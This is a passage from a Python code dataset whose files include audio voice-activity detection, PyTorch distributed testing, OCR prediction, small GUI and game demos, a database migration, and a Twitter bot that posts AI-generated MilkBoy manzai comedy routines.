%(message)s')\r\n formatter = logging.Formatter('%(relativeCreated)d - %(name)s - %(levelname)s - %(message)s')\r\n\r\n handler = logging.handlers.RotatingFileHandler(\r\n LOG_FILENAME, maxBytes=50000, backupCount=5)\r\n handler.setFormatter(formatter)\r\n handler.doRollover() # Force a new log\r\n my_logger.addHandler(handler)\r\n\r\n # Create a seperate my_logger2 that has a different formatter\r\n # Difference is that it indents the output by a TAB\r\n formatter2 = logging.Formatter('\\t%(relativeCreated)d - %(name)s - %(levelname)s - %(message)s')\r\n handler2 = logging.handlers.RotatingFileHandler(\r\n LOG_FILENAME, maxBytes=50000, backupCount=5)\r\n handler2.setFormatter(formatter2)\r\n my_logger2.addHandler(handler2)\r\n # Below filter needed if using SECS in formetter\r\n #my_logger.addFilter(ContextFilter())\r\n\r\n\r\ndef setLogLevel(iLevel):\r\n levels = {\r\n \"ERROR\": logging.ERROR,\r\n \"DEBUG\": logging.DEBUG,\r\n \"INFO\": logging.INFO,\r\n \"WARN\": logging.WARN\r\n }\r\n\r\n logLevel = levels[iLevel]\r\n my_logger.setLevel(logLevel)\r\n my_logger2.setLevel(logLevel)\r\n\r\ndef initLogger():\r\n global LOG_FILENAME, my_logger, my_logger2\r\n # Set up a specific logger with our desired output level\r\n my_logger = logging.getLogger('MyLogger')\r\n my_logger.setLevel(logging.DEBUG)\r\n my_logger2 = logging.getLogger('MyLogger2')\r\n my_logger2.setLevel(logging.DEBUG)\r\n #my_logger.setLevel(logging.INFO)\r\n #my_logger.setLevel(logging.WARN)\r\n #my_logger.setLevel(logging.ERROR)\r\n\r\n logsDir = os.path.dirname(LOG_FILENAME)\r\n if not os.path.exists(logsDir):\r\n os.makedirs(logsDir)\r\n\r\n getLoggerClearLog()\r\n\r\n\r\ninitLogger()\r\n\r\n","sub_path":"utils/logit.py","file_name":"logit.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"607314840","text":"import io\nimport numpy as np\nimport torch\ntorch.set_num_threads(1)\nimport torchaudio\nimport matplotlib\nimport matplotlib.pylab as plt\ntorchaudio.set_audio_backend(\"soundfile\")\nimport pyaudio\nimport time\n\nplt.rcParams[\"figure.figsize\"]=(12,3)\n\nmodel, utils = torch.hub.load(repo_or_dir='snakers4/silero-vad',\n model='silero_vad',\n force_reload=True)\n\n\n(get_speech_ts,\n get_speech_ts_adaptive,\n save_audio,\n read_audio,\n state_generator,\n single_audio_stream,\n collect_chunks) = utils\n\n# Taken from utils_vad.py\ndef validate(model,\n inputs: torch.Tensor):\n with torch.no_grad():\n outs = model(inputs)\n return outs\n\n# Provided by Alexander Veysov\ndef int2float(sound):\n abs_max = np.abs(sound).max()\n sound = sound.astype('float32')\n if abs_max > 0:\n sound *= 1/abs_max\n sound = sound.squeeze() # depends on the use case\n return sound\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nSAMPLE_RATE = 16000\nCHUNK = int(SAMPLE_RATE / 10)\n\naudio = pyaudio.PyAudio()\n\nframes_to_record = 20 # frames_to_record * frame_duration_ms = recording duration\nframe_duration_ms = 250\n\nstream = audio.open(format=FORMAT,\n channels=CHANNELS,\n rate=SAMPLE_RATE,\n input=True,\n frames_per_buffer=CHUNK)\ndata = []\nvoiced_confidences = []\ntest_confidences = []\n\n# from jupyterplot import ProgressPlot\nimport threading\n\ncontinue_recording = True\n\ndef stop():\n input(\"Press Enter to stop the recording:\")\n global continue_recording\n continue_recording = False\n\ndef start_recording():\n stream = audio.open(format=FORMAT,\n channels=CHANNELS,\n rate=SAMPLE_RATE,\n input=True,\n frames_per_buffer=CHUNK)\n startTime=time.time()\n data = []\n voiced_confidences = []\n test_confidences = []\n\n global continue_recording\n continue_recording = True\n\n # pp = ProgressPlot(plot_names=[\"Silero VAD\"], line_names=[\"speech probabilities\"], x_label=\"audio chunks\")\n\n\n stop_listener = threading.Thread(target=stop)\n stop_listener.start()\n\n isAgain = False\n temp_confidence = []\n speechCount = 0\n checkTime = 0\n while continue_recording:\n audio_chunk = stream.read(int(SAMPLE_RATE * frame_duration_ms / 1000.0))\n\n # in case you want to save the audio later\n data.append(audio_chunk)\n\n audio_int16 = np.frombuffer(audio_chunk, np.int16);\n\n audio_float32 = int2float(audio_int16)\n\n # get the confidences and add them to the list to plot them later\n vad_outs = validate(model, torch.from_numpy(audio_float32))\n\n # get the confidence value so that jupyterplot can process it\n new_confidence = vad_outs[:, 1].numpy()[0].item()\n # new_confidence = vad_outs[:, 1]\n\n #잘 되는 코드 하나 근데 쪼금 불안정\n # if new_confidence>0.7 and isAgain is False : #처음 시작 타임체크\n # checkTime = time.time()\n # isAgain = True\n # elif new_confidence>0.7 and isAgain is True and Toggle is False: #다음 일때, 연속 체크\n # nowTime = time.time()\n # temp_confidence.append(new_confidence)\n # temp_avg = sum(temp_confidence)/len(temp_confidence)\n # if nowTime - checkTime > 7 and temp_avg>0.5: #7초가 지났을 때\n # speechCount+=1\n # isAgain=False\n # Toggle=True\n # print(\"발표!\", nowTime-startTime)\n # temp_confidence.clear()\n # if new_confidence<=0.7:\n # Toggle=False\n\n if new_confidence>0.7 and isAgain is False:\n isAgain = True\n checkTime = time.time()\n\n if isAgain is True:\n temp_confidence.append(new_confidence)\n nowTime=time.time()\n if nowTime - checkTime > 6: #6초의 타임스팬에서\n temp_avg = sum(temp_confidence)/len(temp_confidence)\n temp_spoken = sum(map(lambda x: x > 0.6, temp_confidence))\n temp_spoken_ratio = temp_spoken/len(temp_confidence)\n if temp_spoken_ratio>0.4: #말을 한 비율이 40%정도면 발표로 인식\n speechCount+=1\n balpyo_time = nowTime-startTime\n print(\"발표! {}분 {}초\".format(int(balpyo_time/60), int(balpyo_time%60)))\n temp_confidence.clear()\n isAgain=False\n\n\n if len(voiced_confidences)>50 :\n del voiced_confidences[0]\n voiced_confidences.append(new_confidence)\n test_confidences.append(new_confidence)\n\n # print(type(voiced_confidences))\n\n # pp.update(new_confidence)\n plt.clf()\n plt.ylim([0,1])\n plt.xticks([])\n plt.axhline(y=0.7)\n plt.plot(voiced_confidences)\n plt.pause(0.00001)\n\n print(\"\\n\\n총 발표 횟수 : \",speechCount)\n # pp.finalize()\n # plt.plot(new_confidence)\n # plt.figure(figsize=(12, 6))\n endTime = time.time()\n timeSpan = endTime-startTime\n # print(timeSpan)\n # print(voiced_confidences)\n count = sum(map(lambda x: x > 0.7, test_confidences))\n length = len(test_confidences)\n\n print(\"발화 비율 : \", (count/length)*100, \"%\")\n plt.savefig('vad_result.png', bbox_inches='tight')\n # plt.show()\n\n\n# print(type(voiced_confidences))\nstart_recording()\n# count = sum(map(lambda x : x<0.2, voiced_confidences))\n# print(\"total length\", len(voiced_confidences))\n# print('Count of odd numbers in a list : ', count)","sub_path":"VoiceActivityDetection.py","file_name":"VoiceActivityDetection.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"191050054","text":"#!/usr/env/python3\n\n\ndef main():\n after_g()\n\n\n# Print words that begin after letter \"G\"/\"g\" in upper case\ndef after_g():\n ret = \"\"\n flag = False\n s = input(\"enter a 1 sentence quote, non-alpha separate words:\")\n for word in s.split(\" \"):\n if word[0].lower() > 'g':\n flag = True\n for l in word:\n if l.isalpha():\n ret += l.upper()\n if flag:\n print(ret)\n ret = \"\"\n flag = False\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Module_1_II.py","file_name":"Module_1_II.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"175582448","text":"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport collections\r\nimport json\r\nimport math\r\nimport os\r\nimport random\r\n#import modeling\r\n#import optimization\r\n#import tokenization\r\nimport six\r\n#import tensorflow as tf\r\nimport argparse\r\nimport re\r\nimport sys\r\n\r\nimport logging\r\nimport math\r\nimport os\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import CrossEntropyLoss, MSELoss\r\nimport torch.nn.functional as F\r\nimport torch.distributed as dist\r\n\r\nfrom torch.utils.data import Dataset\r\nfrom torch.utils.data import DataLoader\r\n\r\n# long term memory should be cross gpus.\r\n# \r\n#class Memory:\r\n# def __init__(self, dim, device):\r\n# self.mem = torch.rand([dim], dtype=torch.float, device = device)\r\n\r\n#class NpBufferModule(nn.Module):\r\n# def __init__(self):\r\n# super().__init()\r\n# self._persistent_buffers_set = set() \r\n# def register_persistent(self, name, persistent=True)\r\n# if persistent:\r\n# self._persistent_buffers_set.add(name)\r\n# else:\r\n# self._persistent_buffers_set.discard(name)\r\n\r\nclass DNN(nn.Module):\r\n \"\"\"Construct the embeddings from word, position and token_type embeddings.\r\n \"\"\"\r\n def __init__(self, input_dim, hidden_dim, output_dim): #, cache_mem):\r\n super().__init__()\r\n\r\n self.output_dim = output_dim\r\n self.input_dim = input_dim\r\n\r\n self.proj1 = nn.Linear(input_dim, hidden_dim, bias=False)\r\n self.proj2 = nn.Linear(hidden_dim, output_dim, bias=False)\r\n\r\n self.register_buffer('param', torch.zeros([output_dim], dtype=torch.float)) #, persistent=False)\r\n\r\n self.register_buffer('mem', torch.rand([output_dim], dtype=torch.float)) #, persistent=False)\r\n #self.param = None # torch.rand([output_dim], dtype=torch.float)\r\n #self.cache_mem = cache_mem\r\n #self.param = None # torch.zeros([self.output_dim], device = device, dtype=torch.float)\r\n \r\n def init_param(self, device): # d_idx, device):\r\n #self.cache_mem[d_idx] = torch.zeros([self.output_dim], device = device, dtype=torch.float)\r\n self.param = torch.zeros([self.output_dim], device = device, dtype=torch.float)\r\n print('initial cache parameters.')\r\n \r\n def gather_x(self, x):\r\n #with torch.no_grad():\r\n gathered_x = [torch.ones_like(x) for _ in range(torch.distributed.get_world_size())]\r\n torch.distributed.all_gather(gathered_x, x, async_op=False)\r\n gathered_x = torch.cat(gathered_x, dim=0)\r\n return gathered_x\r\n \r\n\r\n def forward(self, x):\r\n print(x.device)\r\n \r\n #d_idx = int(str(x.device).split(':')[1])\r\n #if not d_idx in self.cache_mem : # [d_idx] == None:\r\n # self.init_param(d_idx, x.device)\r\n #if self.param == None:\r\n # self.init_param(x.device)\r\n\r\n h1 = self.proj1(x)\r\n #h1 = F.tanh(h1)\r\n h2 = self.proj2(h1)\r\n\r\n #g_h2 = self.gather_x(h2)\r\n\r\n\r\n # h2 = h2 + self.param.detach() # [d_idx].detach()\r\n\r\n\r\n # t = h2.sum(dim=0)\r\n \r\n # with torch.no_grad():\r\n # self.param.copy_(t.detach())\r\n\r\n # h2_full = self.gather_x(h2)\r\n # mem_score = torch.matmul(h2_full, self.mem)\r\n # print('mem_score', mem_score)\r\n\r\n # gathered_score = [torch.ones_like(x) for _ in range(torch.distributed.get_world_size())]\r\n \r\n # torch.distributed.gather(mem_score[0:2], )\r\n\r\n return h2\r\n\r\n def zero_init(self):\r\n with torch.no_grad():\r\n #h2.weight.data.normal_(mean=0.0, std=0.02)\r\n self.proj2.weight.data.zero_()\r\n self.proj2.bias.data.zero_()\r\n #self.proj2.weight.data\r\n\r\n def layer1(self, x):\r\n h1 = self.proj1(x)\r\n h1 = F.tanh(h1)\r\n return h1\r\n\r\n#gpu_id = '2,3'\r\n#device_num = len(gpu_id.split(','))\r\n#print(\"set gpu number \", device_num, gpu_id)\r\n\r\n#os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)\r\n#device_ids = [t for t in range(0, device_num)]\r\n\r\ntorch.manual_seed(911)\r\n#device = torch.device(\"cuda:0\")\r\n\r\n# python -m torch.distributed.launch --nproc_per_node=4 python/open_reasoNet/test_multigpu.py\r\n\r\n\r\nclass RandomDataset(Dataset):\r\n def __init__(self, local_rank, device):\r\n self.len = 11\r\n self.data = torch.stack([torch.ones(5), torch.ones(5)*2,\r\n torch.ones(5)*3,torch.ones(5)*4,\r\n torch.ones(5)*5,torch.ones(5)*6,\r\n torch.ones(5)*7,torch.ones(5)*8,\r\n torch.ones(5)*9, torch.ones(5)*10,\r\n torch.ones(5)*11]).to(device)\r\n self.local_rank = local_rank\r\n def __getitem__(self, index):\r\n return self.data[index]\r\n\r\n def __len__(self):\r\n return self.len\r\n\r\ndef main():\r\n # local cache. (no merge).\r\n #cache_mem = {}\r\n #for d in range(device_num):\r\n # cache_mem.append(None)\r\n\r\n # global cache,\r\n \r\n #rank = args.nr * args.gpus + gpu \r\n dist.init_process_group(backend='nccl')\r\n local_rank = torch.distributed.get_rank()\r\n torch.cuda.set_device(local_rank)\r\n device = torch.device(\"cuda\", local_rank) \r\n\r\n net = DNN(5, 3, 2) #, cache_mem)\r\n #if device_num > 1:\r\n # torch.distributed.init_process_group(backend=\"nccl\")\r\n # device = torch.device(\"cuda\", self.local_rank)\r\n\r\n #net = nn.DataParallel(net, device_ids=device_ids)\r\n\r\n net.to(device)\r\n print('model in gpu')\r\n \r\n net = torch.nn.parallel.DistributedDataParallel(net, device_ids=[local_rank], output_device=local_rank, broadcast_buffers=False)\r\n \r\n\r\n dataset = RandomDataset(local_rank, device)\r\n sampler = torch.utils.data.distributed.DistributedSampler(dataset)\r\n\r\n rand_loader = DataLoader(dataset=dataset, batch_size=2, sampler=sampler)\r\n #e = 0\r\n #while e < 2:\r\n # sampler.set_epoch(e)\r\n # for data in rand_loader:\r\n # print(data)\r\n # e+=1\r\n #return\r\n\r\n batch = 2\r\n inx = torch.rand([batch, 5], dtype=torch.float, device=device)\r\n\r\n for b in range(batch):\r\n inx[b] = inx[b] * local_rank \r\n\r\n net.train()\r\n \r\n net.init_param()\r\n\r\n for i in range(10):\r\n outy = net(inx)\r\n #print(outy.shape)\r\n print(outy)\r\n\r\n #net.module.zero_init()\r\n #outz = net(inx)\r\n\r\n #print(outz.shape)\r\n #print(outz)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"python/open_reasoNet/test_multigpu.py","file_name":"test_multigpu.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"133781913","text":"import cv2,time,os,re\nimport tensorflow as tf\nimport numpy as np\nimport utils\nimport model\nFLAGS = utils.FLAGS\n\npre_data_dir = '/home/sjhbxs/Data/data_coco_task2/ICDAR_TASK2_new2'\n#data_dir = pre_data_dir + '/test_data/val_words'\ndata_dir = pre_data_dir + '/test_data/val_words'\nsave_dir = '../log/text_save/analysis_predict.txt'\n\ndef predict_func_tem():\n if True: \n test_feeder=utils.DataIterator3(data_dir=data_dir)\n print(test_feeder.image_num) \n for cur_batch in range(int(test_feeder.size / FLAGS.batch_size) + 1):\n indexs=[]\n cur_batch_num = FLAGS.batch_size\n if cur_batch == int(test_feeder.size / FLAGS.batch_size):\n cur_batch_num = test_feeder.size - cur_batch * FLAGS.batch_size \n for i in range(cur_batch_num):\n indexs.append(cur_batch * FLAGS.batch_size + i) \n \ndef predict_func():\n g = model.Graph()\n with tf.Session(graph = g.graph) as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver(tf.global_variables(),max_to_keep=100)\n ckpt = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n if ckpt:\n saver.restore(sess,ckpt)\n print('restore from ckpt{}'.format(ckpt))\n else:\n print('cannot restore') \n test_feeder=utils.DataIterator3(data_dir=data_dir)\n f=open(save_dir,mode=\"a\")\n print(\"total data:\",test_feeder.size)\n print(\"total image in folder\", test_feeder.total_pic_read)\n total_epoch = int(test_feeder.size / FLAGS.batch_size) + 1\n for cur_batch in range(total_epoch):\n print(\"cur_epoch/total_epoch\",cur_batch,\"/\",total_epoch)\n indexs=[]\n cur_batch_num = FLAGS.batch_size\n if cur_batch == int(test_feeder.size / FLAGS.batch_size):\n cur_batch_num = test_feeder.size - cur_batch * FLAGS.batch_size \n for i in range(cur_batch_num):\n indexs.append(cur_batch * FLAGS.batch_size + i) \n test_inputs, num_batch=test_feeder.input_index_generate_batch(indexs)\n test_feed={g.inputs: test_inputs,\n g.seq_len: np.array([g.cnn_time]*test_inputs.shape[0]),\n g.keep_prob_fc: 1,\n g.keep_prob_cv1: 1,\n g.keep_prob_cv2: 1,\n g.keep_prob_cv3: 1,\n g.keep_prob_cv4: 1}\n dense_decoded, logits_before_ctc= sess.run([g.dense_decoded,g.logits_before_ctc],test_feed)\n for encode_list,dense_list, e_num in zip(logits_before_ctc, dense_decoded, num_batch):\n decode_string = utils.decode_function1(encode_list)\n decode_string1 = utils.decode_function1(dense_list)\n f.write(e_num + \",\" + decode_string + \",\" + decode_string1 + \",\" + str(encode_list) + \"\\n\")\n f.close()\n print(\"saved prediction\")\n \n\nif __name__ == '__main__':\n predict_func()\n","sub_path":"ICDAR_TASK2_new11/code_py/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"428321604","text":"#!/usr/bin/env python\n\nimport wx\n\nclass TestFrame(wx.Frame):\n def __init__(self, parent, title):\n wx.Frame.__init__(self, parent, wx.ID_ANY, title=title)\n text = wx.StaticText(self, label=\"Hallo Welt!\")\n\napp = wx.App(redirect=False)\nframe = TestFrame(None, \"Ein kleines Beispiel\")\nframe.Show()\napp.MainLoop()\n","sub_path":"python/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"191498296","text":"from computerclass import Computer\n\ndef main():\n num = input(\"\\nElija un numero: \")\n juego = Computer()\n intento = 0\n while juego.is_playing == True:\n intento = intento + 1\n print(\"Recuerde que su numero es: \",num)\n juego.play()\n print(f\"Termino en {intento} intentos\")\nmain()\n","sub_path":"Practicas/prueba2/listo/juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"127688778","text":"\"\"\"empty message\n\nRevision ID: 2970b6fdf939\nRevises: 384c7334912b\nCreate Date: 2018-10-24 12:11:33.339262\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2970b6fdf939'\ndown_revision = '384c7334912b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user_flag',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('flag', sa.String(length=127), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('user_flag_event',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_flag_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('thrower_id', sa.Integer(), nullable=True),\n sa.Column('time_thrown', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['thrower_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['user_flag_id'], ['user_flag.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_flag_event_thrower_id'), 'user_flag_event', ['thrower_id'], unique=False)\n op.create_index(op.f('ix_user_flag_event_user_flag_id'), 'user_flag_event', ['user_flag_id'], unique=False)\n op.create_index(op.f('ix_user_flag_event_user_id'), 'user_flag_event', ['user_id'], unique=False)\n op.drop_index('ix_user_displayname', table_name='user')\n op.create_index(op.f('ix_user_displayname'), 'user', ['displayname'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_user_displayname'), table_name='user')\n op.create_index('ix_user_displayname', 'user', ['displayname'], unique=True)\n op.drop_index(op.f('ix_user_flag_event_user_id'), table_name='user_flag_event')\n op.drop_index(op.f('ix_user_flag_event_user_flag_id'), table_name='user_flag_event')\n op.drop_index(op.f('ix_user_flag_event_thrower_id'), table_name='user_flag_event')\n op.drop_table('user_flag_event')\n op.drop_table('user_flag')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2970b6fdf939_.py","file_name":"2970b6fdf939_.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"447387971","text":"def main():\r\n ## Display the names of the first three presidents.\r\n file = \"FirstPresidents.txt\"\r\n displayWithForLoop(file)\r\n print()\r\n displayWithListComprehension(file)\r\n \r\ndef displayWithForLoop(file):\r\n infile = open(file, 'r')\r\n for line in infile:\r\n print(line, end=\"\")\r\n infile.close()\r\n \r\ndef displayWithListComprehension(file):\r\n infile = open(file, 'r')\r\n listPres = [line[:-1] for line in infile]\r\n infile.close()\r\n print(listPres)\r\n \r\nmain() \r\n\r\n","sub_path":"EX/CH5/5-1-1.py","file_name":"5-1-1.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"53029274","text":"#!/usr/bin/env python3\n\nimport pyglet\nfrom pyglet.media.procedural import Sine\nfrom pyglet.window import key\nfrom src.config import CTRL_CMD\n\nclass Sound (Sine):\n def replay(self):\n self.seek(0)\n return self.play()\n\nBLACK=(0, 0, 0, 255)\nWHITE=(255, 255, 255, 255)\nBCKND=(0, .5, .8, 1)\n\nwindow = pyglet.window.Window(640, 480)\n\npyglet.gl.glClearColor(*BCKND)\n\nchecker_pattern = pyglet.image.CheckerImagePattern(color1=BLACK, color2=WHITE)\nimage = pyglet.image.create(64,64, checker_pattern)\nimage.anchor_x = 32\nimage.anchor_y = 32\nsprite = pyglet.sprite.Sprite(img=image, x=320, y=240)\n\nsound = Sine(0.1, 830)\nsound.__class__ = Sound\n\n@window.event\ndef on_key_press(symbol, mods):\n #Manage exit\n if mods & CTRL_CMD and (symbol == key.Q or symbol == key.W):\n pyglet.app.exit()\n elif symbol == key.ESCAPE:\n return pyglet.event.EVENT_HANDLED\n \n elif symbol == key.A:\n sprite.x -= 5\n sound.replay()\n elif symbol == key.W:\n sprite.y += 5\n sound.replay()\n elif symbol == key.D:\n sprite.x += 5\n sound.replay()\n elif symbol == key.S:\n sprite.y -= 5\n sound.replay()\n\n@window.event\ndef on_draw():\n window.clear()\n sprite.draw()\n\ndef update(dt):\n sprite.rotation += dt * 45\n \npyglet.clock.schedule_interval(update, 1 / 60.0)\n\npyglet.app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"166721259","text":"\"\"\"\nWSGI config for config project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/\n\"\"\"\n\nimport os\nimport time\nimport datetime\nimport random\nimport schedule\nimport threading\nimport requests\n\nfrom django.core.wsgi import get_wsgi_application\nfrom milkboy.views import GENRES\nfrom milkboy.coreAI import generate_neta_list\nfrom twitter import Twitter, TwitterStream, OAuth\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.prod')\n\napplication = get_wsgi_application()\n\n\ndef get_auth():\n try:\n from config.settings import dev\n auth = OAuth(\n dev.TW_TOKEN,\n dev.TW_TOKEN_SECRET,\n dev.TW_CONSUMER_KEY,\n dev.TW_CONSUMER_SECRET\n )\n print('this is from dev')\n except:\n from config.settings import prod\n auth = OAuth(\n prod.TW_TOKEN,\n prod.TW_TOKEN_SECRET,\n prod.TW_CONSUMER_KEY,\n prod.TW_CONSUMER_SECRET\n )\n print('this is from prod')\n return auth\n\n\ndef tweet():\n res = 'fail'\n print(res)\n while res != 'success':\n time.sleep(10)\n start_t = time.time()\n stage_max = 3\n genre_name = random.choice(GENRES + ['random']*3)\n print(genre_name)\n theme = pred1 = pred2 = ''\n first_stage = {}\n neta_list = []\n stage_num = 3\n while True:\n try:\n seed = random.randint(0, 100000)\n if genre_name == 'random':\n neta_list = generate_neta_list('random', seed, stage_max)\n else:\n neta_list = generate_neta_list('', seed, stage_max, genre_name)\n stage_num = len(neta_list)\n if time.time() - start_t > 30:\n continue\n except:\n continue\n first_stage = neta_list[0] if stage_num > 1 else neta_list[-1]\n theme = first_stage['theme']\n pred1, pred2 = first_stage['pred1'], first_stage['pred2']\n if pred1 != '' and pred2 != '':\n break\n # つかみ\n text1, text2 = tsukami_script(theme, first_stage['tsukami'])\n first_tweet = update_status(text1)\n data = update_status(text2, first_tweet['id'])\n # 導入\n texts = introduction(first_stage['category'], pred1, pred2)\n data = multiple_tweets(texts, data)\n for i in range(stage_num):\n neta = neta_list[i] if i < stage_num - 1 else neta_list[-1]\n feat_text = [f\"駒場「{neta['featX']}」\\n\\n\", f\"内海「{neta['featX_reply']}」\\n\\n\",\n f\"駒場「{neta['anti_featX']}」\\n\\n\", f\"内海「{neta['anti_featX_reply']}」\\n\\n\"]\n if i != stage_num - 2:\n feat_text.append(f\"駒場「{neta['conjunction']}」\\n\\n\")\n if i == stage_num - 1:\n feat_text.append(\"内海「いや、絶対ちゃうやろ。」\\n\\n\")\n feat_text.append(\"内海「もうええわ、どうもありがとうございました。」\\n\\n\")\n data = multiple_tweets(feat_text, data)\n print('last of tweet func')\n res = 'success'\n print(res)\n return\n\n\ndef auto_reply():\n twitter_stream = TwitterStream(auth=get_auth())\n theme = pred1 = pred2 = ''\n first_stage = {}\n neta_list = []\n stage_num = 3\n print('activate auto reply')\n for tweet in twitter_stream.statuses.filter(language='ja', track='@milkboy_core_ai テーマ'):\n start_t = time.time()\n stage_max = 3\n print(tweet)\n try:\n theme = tweet['text'].split()[-1]\n if '@' in theme or len(theme) > 30:\n continue\n tle = False\n while True:\n try:\n seed = random.randint(0, 100000)\n neta_list = generate_neta_list(theme, seed, stage_max)\n stage_num = len(neta_list)\n if time.time() - start_t > 30:\n tle = True\n break\n except:\n continue\n first_stage = neta_list[0] if stage_num > 1 else neta_list[-1]\n pred1, pred2 = first_stage['pred1'], first_stage['pred2']\n print(pred1)\n if pred1 != '' and pred2 != '':\n break\n if tle:\n continue\n # つかみ\n text1, text2 = tsukami_script(theme, first_stage['tsukami'])\n first_tweet = update_status(text1)\n data = update_status(text2, first_tweet['id'])\n # 導入\n texts = introduction(first_stage['category'], pred1, pred2)\n data = multiple_tweets(texts, data)\n for i in range(stage_num):\n neta = neta_list[i] if i < stage_num - 1 else neta_list[-1]\n feat_text = [f\"駒場「{neta['featX']}」\\n\\n\", f\"内海「{neta['featX_reply']}」\\n\\n\",\n f\"駒場「{neta['anti_featX']}」\\n\\n\", f\"内海「{neta['anti_featX_reply']}」\\n\\n\"]\n if i != stage_num - 2:\n feat_text.append(f\"駒場「{neta['conjunction']}���\\n\\n\")\n if i == stage_num - 1:\n feat_text.append(\"内海「いや、絶対ちゃうやろ。」\\n\\n\")\n feat_text.append(\"内海「もうええわ、どうもありがとうございました。」\\n\\n\")\n data = multiple_tweets(feat_text, data)\n reply_text = f\"@{tweet['user']['screen_name']}\\nネタを投稿しました!\\n\"\n reply_text += f\"https://twitter.com/milkboy_core_ai/status/{first_tweet['id']}\"\n update_status(reply_text, tweet['id_str'])\n except:\n continue\n\n\ndef multiple_tweets(texts, data):\n text = ''\n for tweet_text in texts:\n if len(text + tweet_text) <= 130:\n text += tweet_text\n elif len(text) == 0:\n data = update_status(tweet_text, data['id'])\n else:\n data = update_status(text, data['id'])\n text = tweet_text\n data = update_status(text, data['id'])\n return data\n\n\ndef update_status(tweet_text, reply_id=None):\n max_len = 130\n texts = []\n if len(tweet_text) > max_len:\n left = 0\n right = max_len\n texts.append(tweet_text[left:right])\n while right < len(tweet_text):\n left += max_len\n right += max_len\n texts.append(tweet_text[left:right])\n else:\n texts.append(tweet_text)\n if reply_id is None:\n data = API.statuses.update(status=texts[0])\n else:\n data = API.statuses.update(status=texts[0], in_reply_to_status_id=reply_id)\n for text in texts[1:]:\n data = API.statuses.update(status=text, in_reply_to_status_id=data['id'])\n return data\n\n\ndef tsukami_script(word, tsukami):\n dt_now = datetime.datetime.now()\n text = dt_now.strftime('%m月%d日 %H:%M:%S') + \"\\n\\n\"\n text += f\"テーマ: {word}\\n\\n\"\n text += \"内海「どうもーミルクボーイです。お願いします。」\\n\\n\"\n\n text2 = \"内海「あーありがとうございますー。\"\n if len(tsukami) >= 10:\n text2 += 'ね、今、[' + tsukami + ']をいただきましたけどもね。'\n text2 += 'こんなんなんぼあっても良いですからね、'\n else:\n text2 += 'ね、今、何もいただけませんでしたけどもね。'\n text2 += '何ももらえなくてもね、聞いてもらえるだけ'\n text2 += 'ありがたいですよ。いうとりますけどもね。」\\n\\n'\n return text, text2\n\n\ndef introduction(category, pred1, pred2):\n text = '駒場「うちのおかんがね、好きな[' + category + ']があるらしいんやけど、その名前をちょっと忘れたらしくてね。」\\n\\n'\n text += '内海「好きな[' + category + ']忘れてもうて。どうなってんねんそれ。\\n\\n'\n\n text2 = '内海「ほんでもおかんが好きな[' + category + ']なんて、[' + pred1 + ']か[' + pred2 + ']くらいでしょう。」\\n\\n'\n text2 += '駒場「それが違うらしいねんな」\\n\\n'\n\n text3 = '内海「ほんだら俺がね、おかんの好きな[' + category + ']一緒に考えてあげるから、どんな特徴言うてたかとか教えてみてよ。」\\n\\n'\n return text, text2, text3\n\n\ndef daily():\n schedule.every().day.at(\"06:00\").do(tweet)\n schedule.every().day.at(\"09:00\").do(tweet)\n schedule.every().day.at(\"12:00\").do(tweet)\n schedule.every().day.at(\"15:00\").do(tweet)\n 